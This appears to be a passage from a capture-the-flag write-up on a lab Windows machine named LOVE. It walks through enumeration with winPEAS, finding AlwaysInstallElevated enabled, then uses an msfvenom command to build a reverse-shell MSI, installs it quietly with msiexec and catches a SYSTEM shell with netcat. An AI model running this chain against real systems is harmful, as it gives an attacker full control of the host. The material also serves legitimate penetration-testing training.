3 privesc
systeminfo
Host Name: LOVE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
System Type: x64-based PC
PEAS
copy \\10.10.14.119\drive\win.exe
1 file(s) copied.
[+] Cached Creds
[?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
cachedlogonscount is 10
[+] UAC Status
[?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 0 - No prompting
EnableLUA: 1
LocalAccountTokenFilterPolicy: 1
FilterAdministratorToken: 0
[*] LocalAccountTokenFilterPolicy set to 1.
[+] Any local account can be used for lateral movement.
[+] PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.19041.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 51B
[+] Checking AlwaysInstallElevated
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
[+] Enumerating NTLM Settings
LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default
Using https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.119 LPORT=7070 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi
copy \\10.10.14.119\drive\reverse.msi
1 file(s) copied.
msiexec /quiet /i reverse.msi
$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.14.119] from (UNKNOWN) [10.129.105.29] 52606
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
whoami
nt authority\system
Last updated